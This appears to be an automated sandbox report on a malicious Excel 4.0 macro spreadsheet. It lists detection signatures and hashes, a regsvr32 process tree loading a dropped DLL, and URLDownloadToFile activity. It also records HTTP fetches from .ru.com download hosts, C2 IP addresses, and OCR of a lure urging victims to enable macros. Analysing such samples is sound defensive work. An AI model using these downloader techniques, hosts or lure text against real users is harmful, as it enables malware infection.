Loading ...

Play interactive tourEdit tour

Analysis Report documents-351331057.xlsm

Overview

General Information

Sample Name:documents-351331057.xlsm
Analysis ID:384712
MD5:672eb871d16413c505302778d8bf1cf9
SHA1:f88277af9b7f69e32b3c7cd74f8b25804933c093
SHA256:17ab700a69c80c034abefa11b191c5ef211f534442c7688256fb200d5b2f25a1
Tags:xlsm
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Office process drops PE file
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Excel documents contains an embedded macro which executes code when the document is opened
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Yara detected Xls With Macro 4.0

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 5356 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • regsvr32.exe (PID: 6340 cmdline: regsvr32 -s ..\ghnrope MD5: 426E7499F6A7346F0410DEAD0805586B)
    • regsvr32.exe (PID: 6348 cmdline: regsvr32 -s MD5: 426E7499F6A7346F0410DEAD0805586B)
    • regsvr32.exe (PID: 6360 cmdline: regsvr32 -s MD5: 426E7499F6A7346F0410DEAD0805586B)
    • regsvr32.exe (PID: 6380 cmdline: regsvr32 -s MD5: 426E7499F6A7346F0410DEAD0805586B)
    • regsvr32.exe (PID: 6392 cmdline: regsvr32 -s MD5: 426E7499F6A7346F0410DEAD0805586B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
app.xmlJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Sigma Overview

    No Sigma rule has matched

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: documents-351331057.xlsmReversingLabs: Detection: 10%
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
    Source: unknownHTTPS traffic detected: 162.251.80.27:443 -> 192.168.2.5:49706 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 67.222.38.97:443 -> 192.168.2.5:49708 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 173.201.252.173:443 -> 192.168.2.5:49710 version: TLS 1.2

    Software Vulnerabilities:

    barindex
    Document exploit detected (creates forbidden files)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\ghnrope2.dllJump to behavior
    Document exploit detected (drops PE files)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: 0604[1].gif.0.drJump to dropped file
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileAJump to behavior
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe
    Source: global trafficDNS query: name: runolfsson-jayde07s.ru.com
    Source: global trafficTCP traffic: 192.168.2.5:49706 -> 162.251.80.27:443
    Source: global trafficTCP traffic: 192.168.2.5:49702 -> 8.211.4.209:80
    Source: Joe Sandbox ViewIP Address: 162.251.80.27 162.251.80.27
    Source: Joe Sandbox ViewIP Address: 8.211.4.209 8.211.4.209
    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: global trafficHTTP traffic detected: GET /ind.html HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: runolfsson-jayde07s.ru.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /ind.html HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: cremin-ian07u.ru.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /ind.html HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: runolfsson-jayde07s.ru.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /ind.html HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: cremin-ian07u.ru.comConnection: Keep-Alive
    Source: unknownDNS traffic detected: queries for: runolfsson-jayde07s.ru.com
    Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableDate: Fri, 09 Apr 2021 14:50:32 GMTServer: Apache/2.4.6 (CentOS) PHP/5.4.16X-Powered-By: PHP/5.4.16Content-Length: 76Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 2e 3c 2f 68 31 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 2e 68 74 6d 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e Data Ascii: <h1>Not Found.</h1>The requested URL /ind.html was not found on this server.
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://api.aadrm.com/
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://api.cortana.ai
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://api.diagnostics.office.com
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://api.microsoftstream.com/api/
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://api.office.net
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://api.onedrive.com
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://apis.live.net/v5.0/
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://augloop.office.com
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://augloop.office.com/v2
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://cdn.entity.
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://clients.config.office.net/
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://config.edge.skype.com
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://cortana.ai
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://cortana.ai/api
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://cr.office.com
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://dataservice.o365filtering.com
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://dataservice.o365filtering.com/
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://dev.cortana.ai
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://devnull.onenote.com
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://directory.services.
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://graph.ppe.windows.net
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://graph.ppe.windows.net/
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://graph.windows.net
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://graph.windows.net/
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&amp;premium=1
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&amp;premium=1
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&amp;premium=1
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://incidents.diagnostics.office.com
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://lifecycle.office.com
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://login.microsoftonline.com/
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://login.windows.local
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://management.azure.com
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://management.azure.com/
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://messaging.office.com/
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://ncus.contentsync.
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://ncus.pagecontentsync.
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://officeapps.live.com
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://onedrive.live.com
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://onedrive.live.com/embed?
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://outlook.office.com/
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://outlook.office365.com/
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://powerlift.acompli.net
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://settings.outlook.com
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://shell.suite.office.com:1443
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://skyapi.live.net/Activity/
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://staging.cortana.ai
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://store.office.cn/addinstemplate
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://store.office.com/addinstemplate
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://store.office.de/addinstemplate
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://tasks.office.com
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://templatelogging.office.com/client/log
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://web.microsoftstream.com/video/
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://webshell.suite.office.com
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://wus2.contentsync.
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://wus2.pagecontentsync.
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
    Source: 9E06A6E6-90D2-41D3-A4CC-ADC48F853023.0.drString found in binary or memory: https://www.odwebp.svc.ms
    Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
    Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
    Source: unknownHTTPS traffic detected: 162.251.80.27:443 -> 192.168.2.5:49706 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 67.222.38.97:443 -> 192.168.2.5:49708 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 173.201.252.173:443 -> 192.168.2.5:49710 version: TLS 1.2

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: Enable Editing from the yellow bar above i Calibri - 18 - A" A" ES Once You have Enable Editing ,
    Source: Screenshot number: 4Screenshot OCR: Enable Content from the yellow bar above O WHY I CANNOT OPEN THIS DOCUMENT? W You are using iOS
    Source: Document image extraction number: 9Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing , please click Enable Conten
    Source: Document image extraction number: 9Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? You are using iOS or Andro
    Source: Document image extraction number: 15Screenshot OCR: Enable Editing from the yellow bar above CB Once You have Enable Editing, please click Enable Cont
    Source: Document image extraction number: 15Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? W You are using IDS or And
    Source: Screenshot number: 8Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing , please click Enable Conten
    Source: Screenshot number: 8Screenshot OCR: Enable Content from the yellow bar above O WHY I CANNOT OPEN THIS DOCUMENT? W You are using iOS
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: documents-351331057.xlsmInitial sample: CALL
    Source: documents-351331057.xlsmInitial sample: EXEC
    Found abnormal large hidden Excel 4.0 Macro sheetShow sources
    Source: documents-351331057.xlsmInitial sample: Sheet size: 24417
    Office process drops PE fileShow sources
